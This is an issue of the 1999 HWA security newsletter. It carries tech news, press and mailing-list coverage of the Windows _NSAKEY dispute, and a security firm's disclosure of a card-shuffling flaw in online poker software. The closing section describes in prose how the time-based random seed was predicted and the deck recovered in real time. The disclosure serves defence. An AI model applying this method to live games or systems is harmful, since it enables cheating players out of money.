Linux Today (www.linuxtoday.com) announced a new mailing list today. If you subscribe you will get a newsletter, which will cover linux news and alerts, directly in your mailbox. http://linuxtoday.com/createaccount.php3.

++ UNIX-VIRUS MAILING LIST
From Help Net Security http://www.net-security.org/
by BHZ, Wednesday 8th September 1999 on 5:37 pm CET
Interested in Unix viruses? Join the unix-virus mailing list which was created to discuss viruses in the unix environment.
If you want to subscribe send a message with "subscribe unix-virus" in the body of the message to majordomo@virus.beergrave.net.

++ Still no sign of http://www.securify.com/packetstorm/ ....

++ LUCENT'S HIGH-SPEED 'STINGER' (BUS. 7:30 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/21609.html
The company says its new product will allow ISPs and local phone companies to offer DSL service without compromising voice-service quality. Says one analyst: "The 800-pound gorilla is entering the business."

++ CZECHS CHARGE TO CASH IN ON NET (CULT. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/culture/story/21584.html
The Czech Republic is ever ... so ... slowly entering the technology age. Netrepreneurs take some flak, but they push on undaunted. Steve Kettmann reports from Prague.

++ RED, HOT, AND HYPERLINKED (BUS. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/21596.html
With a bilingual version of WebTV and the possibility of building an ambitious fiber-optic link, the island of Cuba may soon be fully connected. By Vito Echevarria.

++ SUN TRIES NET APPLIANCE, AGAIN (BUS. 7:35 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/21633.html
In the world of dumbed-down computers, they don't get any dumber than the Sun Ray. And that's the idea, Sun says: Let the network do the work.

++ CONNECTING ASIA (BUS. 7:35 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/21632.html
Global Crossing, Microsoft, and Softbank say an 11,000-mile, US$1.3 billion telecom network will bring broadband services to Asia. Also: Concentric is buying a British ISP.... Lycos acquiring Quote.com for $78.3 million.... And more.

++ SILICON VALLEY GOES SOUTH (CULT. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/culture/story/21630.html
Hollywood decidedly goes tech, and it's got the conference to prove it: the first annual Digital Coast Conference.
Michael Stroud reports from Los Angeles.

Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(No mail worthy of posting here this issue,)

Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, let's give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up...

==============================================================================

02.0 From the editor.
     ~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /* This issue is a little late, sorry 'bout that but I got a new toy
     * and have been spending time setting it up and playing with it, it's
     * a PII 400 with Voodoo III 3000 and a Diamond Monster sound 3d card
     * with a 19" monitor and 10 gig hd plus a DVD drive and HP 8100 CDRW
     * all that connects to a soho 5 port CAT5 hub which goes out to the
     * cablemodem, my other system will be delegated to FreeBSD and the
     * Linux box remains untouched. FreeBSD will be bestowed with a 13G
     * HD and I am probably going to bring Linux 'up front' as a proxy
     * and shell server at some point... so yay me
     *
     * This issue has a couple of articles contributed by wyzewun of FK
     * (Forbidden Knowledge) a .ZA zine that sheds some light on the hack
     * / security scene in South Africa so read on and enjoy the issue...
     *
     * Cruciphux
     */

    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 NSA Key Found in Windows
     ~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by netmask

Over the weekend a cryptography key with the label of NSA has been found within MS Windows. Some have immediately assumed that this was a back door that would allow the National Security Agency access to any Windows based system. Microsoft has vehemently denied the charge. Others have also stated that such a conclusion, while possible, is unlikely. The most likely scenario is that the key was included to pass export restrictions set up by the NSA and was therefore labeled appropriately.

Wired
http://www.wired.com/news/news/technology/story/21577.html

Wired - Second Story
http://www.wired.com/news/news/technology/story/21589.html

Associated Press - Via San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/817660l.htm

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2328464,00.html

The Australian Age
http://www.theage.com.au/daily/990904/news/news50.html

OSALL - Review of the Aftermath
http://www.aviary-mag.com/News/NSA_FUD/nsa_fud.html

Microsoft - The Response
http://www.microsoft.com/presspass/press/1999/Sept99/RSAPR.htm

The real interesting part of this whole story is that this isn't new. This issue is over three years old.

JYA.com
http://jya.com/msnsa-not.htm

-=-

Wired;

MS Denies Windows 'Spy Key'
by Steve Kettmann and James Glave

10:20 a.m. 3.Sep.99.PDT

Microsoft is vehemently denying allegations by a leading cryptographer that its Windows platform contains a backdoor designed to give a US intelligence agency access to personal computers.
Andrew Fernandes, chief scientist for security software company Cryptonym in Mississauga, Ontario, claimed on his Web site Friday that the National Security Agency may have access to the core security of most major Windows operating systems. "By adding the NSA's key, they have made it easier -- not easy, but easier -- for the NSA to install security components on your computer without your authorization or approval," Fernandes said. But Microsoft denied that the NSA has anything to do with the key. "The key is a Microsoft key -- it is not shared with any party including the NSA," said Windows NT security product manager Scott Culp. "We don't leave backdoors in any products." Culp said the key was added to signify that it had passed NSA encryption standards. Fernandes also simultaneously released a program on his site that will disable the key. The key exists in all recent versions of the Windows operating systems, including Windows 95, 98, 2000, and NT. The issue centers around two keys that ship with all copies of Windows. The keys grant an outside party the access it needs to install security components without user authorization. The first key is used by Microsoft to sign its own security service modules. Until late Thursday, the identity and holder of the second key had remained a mystery. In previous versions of Windows, Fernandes said Microsoft had disguised the holder of the second key by removing identifying symbols. But while reverse-engineering Windows NT Service Pack 5, Fernandes discovered that Microsoft left the identifying information intact. He discovered that the second secret key is labeled "_NSAKEY." Fernandes and many other security experts take that to stand for the National Security Agency -- the nation's most powerful intelligence agency. Microsoft said _NSAKEY signifies that it satisfies security standards. Through its "signals intelligence" division the NSA listens in on the communications of other nations. 
The NSA did not immediately respond to a request for comment via fax, the only way the agency communicates with inquiries from the media. The agency also operates Echelon, a global eavesdropping network that is reportedly able to intercept just about any form of electronic communications anywhere in the world. The agency is forbidden by law from eavesdropping on American citizens. Marc Briceno, director of the Smartcard Developer Association, said the inclusion of the key could represent a serious threat to e-commerce. "The Windows operating-system-security compromise installed by Microsoft on behalf of the NSA in every copy of Windows 95, 98, and NT represents a serious financial risk to any company using MS Windows in e-commerce applications," Briceno wrote in an email. "With the discovery of an NSA backdoor in every copy of the Windows operating systems sold worldwide, both US and especially non-US users of Microsoft Windows must assume that the confidentiality of their business communications has been compromised by the US spy agency," Briceno said. Briceno coordinated the team that broke the security in GSM cell phones, demonstrating that the phones are subject to cloning -- a feat the cellular industry had thought impossible. In making the discovery, Fernandes said he did not know why the key was there. "It could be for espionage. It may not be," he said. "It does not totally compromise Windows, it only weakens it.... The only real reason I can see is for them to be able to install their own security providers." But Microsoft's Culp said all cryptographic software intended for export must be submitted to a National Security Agency review process. He said that the key was so named to indicate that it had completed that process and that it complied with export regulations. 
"The only thing that this key is used for is to ensure that only those products that meet US export control regulations and have been checked can run under our crypto API (application programming interface)," Culp said. "It does not allow anyone to start things, stop services, or allow anything [to be executed] remotely," he said. "It is used to ensure that we and our cryptographic partners comply with United States crypto export regulations.We are the only ones who have access to it." Fernandes made the discovery in early August, he said, but collaborated with the Berlin-based Chaos Computer Club and other experienced hackers worldwide before releasing the information. "We coordinated this through the worldwide hacker scene," said Andy Muller-Maguhn of the CCC. "It was important to American hackers that it not only be mentioned in America but also in Europe. "For American citizens it seems to be normal that the NSA is in their software. But for countries outside of the United States, it is not. We don't want to have the NSA in our software." Coming less than a week after Microsoft was rocked by the embarrassing news that its Hotmail system could be easily penetrated, the latest disclosure could prove damaging to the software giant. "Say I am at a large bank, and I have the entirety of our operation working on Windows," Fernandes said. "That is a little more serious. The only people who could get in there are the NSA, but that might be bad enough. "They have to first manage to download a file into your machine. There may be backdoors that allow them to do that.... Iwould be shocked and surprised if the NSA bothered with individuals. What is more of a concern is security systems for a large bank or another data center. Or even a Web server firm. 
"The result is that it is tremendously easier for the NSA to load unauthorized security services on all copies of Microsoft Windows, and once these security services are loaded, they can effectively compromise your entire operating system. "The US government is currently making it as difficult as possible for 'strong' crypto to be used outside of the US; that they have also installed a cryptographic backdoor in the world's most abundant operating system should send a strong message to foreign IT managers," he said. But Fernandes did not want to set off a panic -- or at least not for everyone. "I personally don't care if the NSA can get into my machine, because I think they have better ways of spying on me as a person," Fernandes said. "But if I was a CEO of a large bank, that would be a different story." Before Microsoft's explanation, many leading cryptographers said they were convinced it was a key for the NSA. "I believe it is an NSA key," said Austin Hill, president of anonymous Internet service company Zero-Knowledge Systems. "We walked though it and talked about all the scenarios why it is there, and this was our conclusion," said Hill. He said that he and Zero-Knowledge's chief scientist, Ian Goldberg, did not believe the key's name is a joke placed there by a Microsoft programmer -- one possible explanation. "Microsoft has not shown incredible competence in the area of security," Hill added. "We call on Microsoft to learn about open security models that provide independent verification of design. No secure system is based on security by obscurity." -=- Wired #2; Debate Flares over MS 'Spy Key' by James Glave 3:00 a.m. 4.Sep.99.PDT Questions lingered Friday over whether or not security experts overreacted to a scientist's charge that Microsoft built a backdoor in Windows for a US spy agency to enter. Microsoft vehemently denied the claims of Andrew Fernandes, chief scientist for security software company Cryptonym. 
"It is a non-story," Microsoft Windows NT security product manager Scott Culp told Wired News. "We don't leave backdoors in any products." See also: MS Denies Windows 'Spy Key' In an early Friday statement posted to his company's Web site, Fernandes had claimed that Microsoft had granted the National Security Agency secret access to the core security of most major Windows operating systems. He made his claims after discovering the name of a key that grants access to the highest level of Windows data-scrambling software code, without the user's permission. The key is named _NSAKEY. The charges seemed to confirm the worst fears of many, and Internet mailing lists erupted early Friday in a Krakatoa of anti-Microsoft sentiment. "Windows is compromised!! Microsoft is in bed with the Federal Government," wrote one poster to a mailing list addressing privacy and crypto issues. The climate was certainly primed for hysteria. Last week, experts uncovered a major flaw in the way Microsoft implements the Java computer language. The company had barely addressed that problem when a gaping hole exposed the private email of potentially millions of Hotmail members -- perhaps the most widespread security incident in the Web history. Microsoft dismissed Friday's charges as nonsense. The company said that the key was named after the spy agency merely to reflect the fact that it had passed a technical review that the agency requires of all security software intended for export. But Fernandes stood his ground. "Some of the things [Microsoft said] make sense, some of them don't," he said. The _NSAKEY is one of two such keys buried deep in the cryptography source code of most Windows operating systems. In other reports, Microsoft said that the _NSAKEY is still a Microsoft-controlled key that will serve as a backup in the event that the first key is compromised. That just doesn't make sense, Fernandes said. 
"If they lost the first key which is the equivalent to them losing the Windows source code, then that would be okay,they could just start using the backup key." "But if all of Windows was compromised [by a hacker], they would have to reissue all of Windows and overwrite [the second key] on top of all copies of Windows out there, which can happen, but it's unlikely." "Their story only kind of makes sense," he added. "If that is in fact true, it means their crypto protocol is poor, there is no other word for it." Crypto expert Marc Briceno did have another word for it: "feeble." "I must say I do not believe Microsoft's present explanation that the presence of the _NSAKEY corresponds to standard practices in software development," said Marc Briceno, director of the Smartcard Developer Association. "There is no technical reason for Microsoft to include a second security module verification key in their operating system ... to mark the passing of export requirements," Briceno said. But a respected independent Windows NT security consultant said that in the wake of Microsoft's denials, the NSA backdoor allegations amount to conspiracy theories. "There's a bunch of somewhat understandable furor going on over the idea that the NSA might have a backdoor to Windows," wrote Russ Cooper, moderator of the NTBugtraq Windows security resource. "Unfortunately, however, all of this is based on a variable name," he added. Anyone who programs knows that variables might get named anything for a variety of reasons." He said the lion's share of individuals overreacting to the claims are freedom fighters and privacy advocates. "Unfortunately they have a loud voice," he said. "I don't think they are representative of the average person, the real people that populate the Net," he said. "We give away all kinds of things, every day, that sacrifice our privacy. These privacy advocates, I'd put them in the category of the Michigan Militia, the Ruby Ridge folks." 
But John Gilmore, a co-founder of the Electronic Freedom Foundation, said that the case was far from clear. Gilmore quoted Microsoft's Scott Culp, who said in a previous Wired News story that the _NSAKEY was only in place "to ensure that we and our cryptographic partners comply with United States crypto export regulations." Gilmore said that the crypto community has always wondered what exactly the deal was between NSA and Microsoft that allows the company to plug strong crypto into software that is sold worldwide. Culp's response was "disingenuous but not false," he wrote in an email to Wired News. "This key was part of the quid-pro-quo that NSA extracted to issue the export license. Let's hear what the whole quid-pro-quo was and what the key is *actually* used for," Gilmore wrote. For its part, the NSA isn't telling. In a short faxed reply to a Wired News query about the purpose of the key, the super-secretive agency said the matter was up to Microsoft. "US export control regulations require that cryptographic [application program interfaces] be signed," NSA's public affairs office wrote. "The implementation of this requirement is left up to the company. Specific questions about specific products should be addressed to the company." Associated Press story; Microsoft denies helping govt snoop BY TED BRIDIS Associated Press Writer WASHINGTON (AP) -- Microsoft Corp. sought to assure consumers Friday that it did not insert a secret backdoor in its popular Windows software to allow the U.S. government to snoop on their sensitive computer data. The sensational charge of a quiet alliance between Microsoft and the U.S. National Security Agency came after a Canadian programmer stumbled across an obscure digital ``signing key'' that had been labeled the ``NSA key'' in the latest version of Microsoft's business-level Windows NT software. 
An organization with such a signature key accepted by Windows could theoretically load software to make it easier to look at sensitive data -- such as e-mail or financial records -- that had been scrambled. The flaw would affect almost any version of Windows, the software that runs most of the world's personal computers. Microsoft forcefully denied that it gave any government agency such a key, and explained that it called its function an ``NSA key'' because that federal agency reviews technical details for the export of powerful data-scrambling software. ``These are just used to ensure that we're compliant with U.S. export regulations,'' said Scott Culp, Microsoft's security manager for its Windows NT Server software. ``We have not shared the private keys. We do not share our keys.'' The claim against Microsoft, originally leveled by security consultant Andrew Fernandes of Mississauga, Ontario, on his Web site, spread quickly in e-mail and discussion groups across the Internet, especially in those corners of cyberspace where Microsoft and the federal government are often criticized. Culp called Fernandes' claims ``completely false.'' An NSA spokesman declined immediate comment. Bruce Schneier, a cryptography expert, said the claim by Fernandes ``makes no sense'' because a government agency as sophisticated as the NSA doesn't need Microsoft's help to unscramble sensitive computer information. ``That it allows the NSA to load unauthorized security services, compromise your operating system -- that's nonsense,'' said Schneier, who runs Counterpane Internet Security Inc. ``The NSA can already do that, and it has nothing to do with this.'' Fernandes, who runs a small consulting firm in Canada, said he found the suspiciously named ``NSA key'' -- along with another key for Microsoft -- while examining the software code within the latest version of Windows NT. 
The existence of the second key was discovered earlier by other cryptographers, but Fernandes was the first to find its official name and theorize about its purpose. ``That (the U.S. government) has ... installed a cryptographic back door in the world's most abundant operating system should send a strong message to foreign (information technology) managers,'' he warned on his Web site. But Fernandes seemed less worried Friday in a telephone interview. ``I don't know that they have reason to lie,'' he said. ``The main point is, you can't really trust what they're saying. They've been caught with their hand in the cookie jar. In fact, I think they're being fairly honest, but you don't know what else is in Windows.'' -=- ZDNET; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- MS denies giving NSA key By Lisa M. Bowman, ZDNN September 3, 1999 3:03 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2328464,00.html Updated at 6:20 PM PT Microsoft is denying claims by a Canadian security company that it has installed a second key in its Windows programs in order to give the U.S. government access to users' computers. Instead, it said it's only following the rules imposed by the U.S. to allow software exports. Andrew Fernandes, the chief scientist of Cryptonym, had claimed that a second key in several versions of the company's Windows operating system contains coding using the letters "NSA," which he said indicated that Microsoft (Nasdaq:MSFT) may be providing a key for the National Security Agency. But Microsoft said it's not, and calls the incident a "tempest in a teapot." Instead, Windows NT security product manager Scott Culp said the company was merely complying with federal rules imposed by the U.S. Commerce Department and NSA to meet export control requirements. 
Culp said the keys have been used for years to verify the digital signatures of partner companies using its crypto application programming interface (API), and to verify that they're export approved. "They're in there because that's how we comply with export controls that the NSA is overseeing," he said. Bad name But he acknowledges the term "NSA" key could arouse suspicion. "It's a really bad name," he said. "I think we're going to rename it after today." The keys are in every copy of Windows 95, 98, NT4 and 2000. The owner of such keys could potentially infiltrate software by using them to go through a so-called "back door" in the software. Because the U.S. government limits the export of strong encryption software, some software makers provide such keys to the government. But Microsoft said it's doing no such thing. "It's totally against our corporate policy," Culp said. The NSA faxed a statement deferring specific questions to Microsoft. Fernandes started his work last year, after two software developers discovered the presence of a second key, but said they didn't know why it was created. Fernandes piggy-backed on that research to learn more about the second key. *** The good news, Fernandes said, is that companies can use a security flaw in the NSA key to add their own strong encryption, in effect overriding the key. More information is at the Cryptonym site. However, even Fernandes said he didn't know for sure if the NSA coding in Windows really refers to the government agency. "I'm in the security business, and the security business is the business of paranoia," he said. Security consultant Richard Smith, president of Phar Lap Software, said the discovery was a minor one. "As in most cases, where there's smoke there's usually fire," he said. "But in my opinion this isn't a very big fire." Fernandes' claim came just two weeks after news began circulating that the U.S. 
Department of Justice was asking for special legislation that would let them spy on computers without a warrant or a user's knowledge. -=- The Australian Age; Microsoft denies it gives government access to Windows By Ted Bridis WASHINGTON, Sept 4 AP - Microsoft Corp sought to assure consumers that it did not insert a secret backdoor in its popular Windows software to allow the US government to snoop on their sensitive computer data. The sensational charge of a quiet alliance between Microsoft and the US National Security Agency came after a Canadian programmer stumbled across an obscure digital ``signing key'' that had been labeled the ``NSA key'' in the latest version of Microsoft's business-level Windows NT software. An organisation with such a signature key accepted by Windows could theoretically load software to make it easier to look at sensitive data _ such as e-mail or financial records _ that had been scrambled. The flaw would affect almost any version of Windows, the software that runs most of the world's personal computers. Microsoft forcefully denied yesterday that it gave any government agency such a key, and explained that it called its function an ``NSA key'' because that federal agency reviews technical details for the export of powerful data-scrambling software. ``These are just used to ensure that we're compliant with US export regulations,'' said Scott Culp, Microsoft's security manager for its Windows NT Server software. ``We have not shared the private keys. We do not share our keys.'' The claim against Microsoft, originally leveled by security consultant Andrew Fernandes of Mississauga, Ontario, on his Web site, spread quickly in e-mail and discussion groups across the Internet, especially in those corners of cyberspace where Microsoft and the federal government are often criticised. Culp called Fernandes' claims ``completely false.'' An NSA spokesman declined immediate comment. 
Bruce Schneier, a cryptography expert, said the claim by Fernandes ``makes no sense'' because a government agency as sophisticated as the NSA doesn't need Microsoft's help to unscramble sensitive computer information. ``That it allows the NSA to load unauthorised security services, compromise your operating system _ that's nonsense,'' said Schneier, who runs Counterpane Internet Security Inc. ``The NSA can already do that, and it has nothing to do with this.'' Fernandes, who runs a small consulting firm in Canada, said he found the suspiciously named ``NSA key'' _ along with another key for Microsoft _ while examining the software code within the latest version of Windows NT. The existence of the second key was discovered earlier by other cryptographers, but Fernandes was the first to find its official name and theorise about its purpose. ``That (the US government) has ... installed a cryptographic back door in the world's most abundant operating system should send a strong message to foreign (information technology) managers,'' he warned on his Web site. But Fernandes seemed less worried yesterday in a telephone interview. ``I don't know that they have reason to lie,'' he said. ``The main point is, you can't really trust what they're saying. They've been caught with their hand in the cookie jar. In fact, I think they're being fairly honest, but you don't know what else is in Windows.'' -AP -=- OSALL Review of the aftermath; NSA Crypto API Key FUD Mike Hudack Editor-in-Chief Some people can claim to have never spread FUD (Fear, Uncertainty and Doubt) in their lives. I guess I can no longer claim such a distinction. I came home from school on Friday around 2:45 (seven or so hours ago) to more than fifty e-mails asking me about the NSA key included in Windows. I moved fast -- too fast. I wrote a story on it, quoting sources I had already read and referencing those sources. 
About half an hour ago I changed the story slightly, making it clear that we had not independently confirmed the action of this second key in the Microsoft Crypto API. The slightly revised article is still here as NSA Backdoor. I moved quickly, calling my media contacts to ensure they knew what was going on. CNN was already working on a story and others had already run with it. Some were waiting for more word. Pressed with Internet time, everyone who was publishing on the Web had already gone with the story, some more tentatively than others. As time went on I began to realize there were a few things wrong with the conclusions being drawn. I didn't want to reverse my position too soon though, and I kept pushing my opinions -- and my natural distrust for the NSA and Microsoft -- although less strenuously. It was around seven o'clock in the evening that I realized something was wrong. The second key included in the Crypto API may have been inserted by the NSA (hence the name) as a backup to the Microsoft key -- and intended only for use on NSA machines. There were a dozen possible explanations, some discussed in the article NSA Ramifications on OSAll. At eight o'clock I began writing this article, double-checking my sources. My NSA contact had called me around nine and told me "I have no idea what's going on. We use NT for a couple things and install some Crypto API programs for tests." That was part of the last straw for me... That and Russ Cooper's wonderful posting to NT Bugtraq did it for me (hopefully we'll get permission from Russ to publish that post here -- it's pending). I'm making no excuses for helping to spread FUD through my over-eager analyzation and reporting, but the pressures of Internet time -- and the lost time of school -- were major issues. -=- Microsoft's spin; Microsoft Says Speculation About Security and NSA Is "Inaccurate and Unfounded" REDMOND, Wash. - Sept. 3, 1999 - Microsoft Corp. 
said today that speculation about Microsoft® Windows® security and the U.S. National Security Agency (NSA) is "inaccurate and unfounded." In response to speculation by a Canadian cryptography company that Microsoft had somehow allowed the NSA to hold a "backdoor" key to the encryption framework in its Windows operating system, Microsoft issued the following statement: "This report is inaccurate and unfounded. The key in question is a Microsoft key. It is maintained and safeguarded by Microsoft, and we have not shared this key with the NSA or any other party. "Microsoft takes security very seriously. This speculation is ironic since Microsoft has consistently opposed the various key escrow proposals suggested by the government because we don't believe they are good for consumers, the industry or national security. "Contrary to this report, the key in question would not allow security services to be started or stopped without the user's knowledge." Microsoft said the key is labeled "NSA key" because NSA is the technical review authority for U.S. export controls, and the key ensures compliance with U.S. export laws. The company reiterated that Microsoft has not shared this key with the NSA or any other company or agency. Founded in 1975, Microsoft (Nasdaq "MSFT") is the worldwide leader in software for personal computers. The company offers a wide range of products and services for business and personal use, each designed with the mission of making it easier and more enjoyable for people to take advantage of the full power of personal computing every day. Microsoft and Windows are either registered trademarks or trademarks of Microsoft Corp. in the United States and/or other countries. Other product and company names herein may be trademarks of their respective owners. 
Note to editors: If you are interested in viewing additional information on Microsoft, please visit the Microsoft Web page at http://www.microsoft.com/presspass/ on Microsoft's corporate information pages. -=- JYA's take on the whole deal; From: "Brian Gladman" To: "UK Crypto List" Subject: Re: NSA key in Windows Date: Mon, 6 Sep 1999 14:23:33 +0100 I am always surprised about just how long it takes to recognise the political implications of simple technological decisions. The Microsoft CAPI issue is well over ***three years old*** and to illustrate this here is a URL for a paper that I wrote in early 1996 to try and get action from the UK government and from the EU when this issue first arose: http://www.seven77.demon.co.uk/capi.pdf [HTML below] In my view the real issue here is not an NSA backdoor (I doubt that one exists in the form postulated) but rather the principle that Microsoft should allow the US government to impose its cryptographic export controls on other sovereign countries by controlling access to the relevant interfaces for integrating cryptographic Service Providers (CSPs) into Windows. When this was topical back in 1996 I objected vigorously to this approach (with ***support*** from GCHQ/CESG!) It took a lot of effort but the UK, at least, did establish a Microsoft UK based capability for signing cryptographic modules separate from that in the US. I might also add that I had access in the UK to the Microsoft CSPDK (Cryptographic Service Provider Developer Kit) in 1997 and the keys now being discussed were openly a part of the CSPDK at the time. If this was an NSA backdoor then they did not make a very good job of hiding it! Hence, while I believe that Microsoft should be criticised for allowing itself to be used by the US government to impose extra-territorial controls on crypto, I am very doubtful that they co-operated in the provision of any backdoor of the form now proposed. 
Brian

@HWA

04.0 Online Gambling is not Secure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Mathew

Besides worrying about how secure your personal information is you now also have to worry about whether the software you are using is playing fair. Reliable Software Technologies has uncovered a serious flaw in the implementation of Texas Hold 'em Poker that is distributed by ASF Software, Inc. This software is used by www.planetpoker.com, www.purepoker.com, and www.deltacasino.com all of whom have been notified of this flaw. The flaw exists in the card shuffling algorithm used to generate each deck which allows a malicious user to know the cards in each player's hand in real time.

Reliable Software Technologies
http://www.rstcorp.com/news/gambling.html

CNN
http://www.cnn.com/TECH/computing/9909/03/internet.poker/index.html (Video stream)

-=-

Reliable Software Technologies

FOR IMMEDIATE RELEASE
September 1, 1999
Press Contact Information

Internet Gambling Software Flaw Discovered by Reliable Software Technologies Software Security Group

Dulles, VA - The Software Security Group at Reliable Software Technologies, the leading authority and industry visionary on software assurance for security-critical software, today announced the discovery of a major security flaw in Internet Gambling software. The flaw can be exploited to bilk innocent players of actual money in online poker games.

Regardless of its quasi-legal status, online gambling presents an entire raft of risks. Key questions include: Will your personal information be handled securely (for example, will the credit card number you're paying with be stolen or the fact that you're gambling at all be leaked)? What if the gaming site is hacked? Could you be playing against cheating insiders or players acting in collusion? Are the games implemented correctly and fairly? Is the software secure?

In response to the last question, we have demonstrated that the answer is no.
The Software Security Group at Reliable Software Technologies has discovered a serious flaw in the implementation of Texas Hold 'em Poker that is distributed by ASF Software, Inc.. We have exploited this flaw in the lab. Our exploit allows a player (us) to calculate the exact deck being used for each hand in real time. That means a player using our exploit knows the cards in every opponent's hand as well as the cards that will make up the flop (cards placed face up on the table after rounds of betting). We can always make the right decision, and consequently maximize our earnings. A malicious attacker could use our exploit to bilk innocent players of actual money without ever being caught. ASF Software and all of their online casino customers have been notified of the flaw. Currently we know of three online casinos (www.planetpoker.com, www.purepoker.com, and www.deltacasino.com) that appear to use ASF Software's implementation of Texas Hold 'em Poker. All three Websites allow players to compete for real money. There is also a demo casino that allows players to gamble with play money. We used our exploit against the demo casino. We also demonstrated, without actually cheating, that it could be used against real money casinos. The flaw exists in the card shuffling algorithm used to generate each deck. Ironically, the code was publicly displayed at www.planetpoker.com/ppfaq.htm with the idea of showing how fair the game is to interested players (the relevant question has since been removed). In the code, a call to randomize() is included to produce a random deck before each deck is generated. The implementation, built with Delphi 4 (a Pascal IDE), seeds the random number generator with the number of milliseconds since midnight according to the system clock. That means the output of the random number generator is easily predicted. A predictable "random number generator" is a very serious security problem. The scenario below illustrates the problem. 
The first screen shows an actual game in progress. In this scene, we are jonnyboy (whose cards are shown face up) and three "flop" cards are displayed. Two other players are participating, but their cards are not displayed (for obvious reasons).

By synchronizing our clock with the clock on the online casino and hitting the "shuffle" button, our program can calculate the exact shuffle. That means we know all the cards that have yet to appear, everyone's hand, and who will win. The screen shot below shows the information displayed by our program in realtime during an actual game. Our program knows what cards are to appear in advance, before they are revealed by the online game.

As you can see in the screen shown below, taken at the conclusion of the demonstration game, our program has correctly determined all the cards. Given our program, a malicious user would know when to hold 'em and know when to fold 'em with 100% accuracy. This information can be used to win money from unsuspecting players.

A typical hand involves $30-1000 in the pot. We estimate over $100,000 worth of money changes hands daily on the four most popular online poker sites.

There are a number of other problems in the poker implementation that could lead to complete security compromise. We have only exploited the easiest one at this time.

The broad take home message from this work is simple: when software misbehaves, bad things can happen. Our mission in the Software Security Group is to stamp out insecure code before it is placed in service. Members of the group involved with the Gambling exploit are: Brad Arkin, Frank Hill, Scott Marks, Matt Schmid, and TJ Walls. The Software Security Group is led by Dr. Gary McGraw.

About RST

Headquartered in Dulles, VA, Reliable Software Technologies Corp. (RST) is a leading authority and industry visionary on software assurance for critical software.
Founded on the simple, compelling premise that software must work, the company offers technology and services that help organizations deliver reliable, robust, and secure software - the essence of software assurance. With expertise in test optimization, security and metrics, RST helps corporations, independent software vendors and system integrators optimize time spent in development and test, dramatically accelerating time-to-market. Learn more about RST on the Web at http://www.rstcorp.com/. Press Contact Information Gary McGraw Reliable Software Technologies 703 404-9293 gem@rstcorp.com More Technical Details; Internet Gambling Software Flaw: More Details Playing poker is risky by nature, but playing online poker for real money may be more of a gamble than you ever expected. The Software Security Group at Reliable Software Technologies (www.rstcorp.com) has discovered a serious flaw in the implementation of Texas Hold 'em Poker that is distributed by ASF Software, Inc. (www.asfgames.com). We were able to develop a program that exploits this flaw and is capable of determining the exact ordering of every card in a shuffled deck; this computation can be performed in real-time, during the playing of an actual poker game. This exploit enables someone to know every card that each player has been dealt and what cards will be coming up during the rest of the hand. Given this information, even the weakest of poker players should know when to hold'em, and when to fold'em. Unlike most casino games, poker is played against other players, not against the house. This means that when someone is cheating at poker, innocent people are hurt by the cheater's unscrupulous actions. ASF Software has been notified of the flaw in their system and has taken corrective actions. The exploit that Reliable Software Technologies developed no longer functions, however the potential for people to take advantage of flaws in online gambling software remains. 
The flaw existed in the algorithm used to produce a shuffled deck of cards before each round of play. Ironically, the code was publicly displayed at www.planetpoker.com/ppfaq.htm with the idea of showing how fair the game is to interested players (the page has since been taken down). The algorithm revealed that the cards were being shuffled using random numbers generated by the Delphi Pascal Random() function. Like most common random number generators, the Random() call uses the Lehmer algorithm to produce streams of pseudo-random numbers. These numbers have many of the mathematical properties associated with random numbers, however they are generated in a completely deterministic manner. This means that given a particular starting point (the random number generator's "seed") the sequence of numbers generated will follow an easily calculated pattern.

The shuffling algorithm used in this software always started with an ordered deck of cards, and then generated a sequence of random numbers that were used to re-order the deck. The seed for a 32-bit random number generator must be a 32-bit number, meaning that there are just over 4 billion possible seeds. This constrains the algorithm to being able to produce only slightly more than 4 billion possible decks of cards; a number much smaller than the 52 factorial (52 * 51 * 50 * … 1) combinations possible in a real deck of cards. The resulting number is close to 2^225.

To make matters worse, the algorithm chose the seed for the random number generator using the Pascal function Randomize(). The Randomize() function chose a seed based on the number of milliseconds since midnight. Since there are only 86,400,000 milliseconds in a day, and this number was being used as the seed for the random number generator, the number of possible decks was now reduced to 86,400,000.
By synchronizing our program with the system clock on the server generating the pseudo-random number, we were able to further reduce the number of possible combinations down to a number on the order of 200,000 possibilities. Searching through this set of shuffles is trivial and can be done on a PC in real time.

The exploit that RST developed required that five cards from the deck were known, and the rest of the deck could then be deduced. In Texas hold'em poker, this meant that the program took as input the two cards that a player is dealt, plus the first three community cards that are dealt face up (called the flop). These five cards are known after the first of four rounds of betting. The program then generated shuffled decks of cards until it found a deck that contained these five cards in the proper positions. Since the Randomize() function is based on the server's system time, it was not very difficult to guess a starting seed with a fair degree of accuracy. After finding a correct seed once, it is then possible to synchronize the exploit program with the server to within a few seconds. This synchronization enables the exploit program to accurately guess the seed being used by the random number generator, and to identify the deck of cards being used during all future games in under one second!

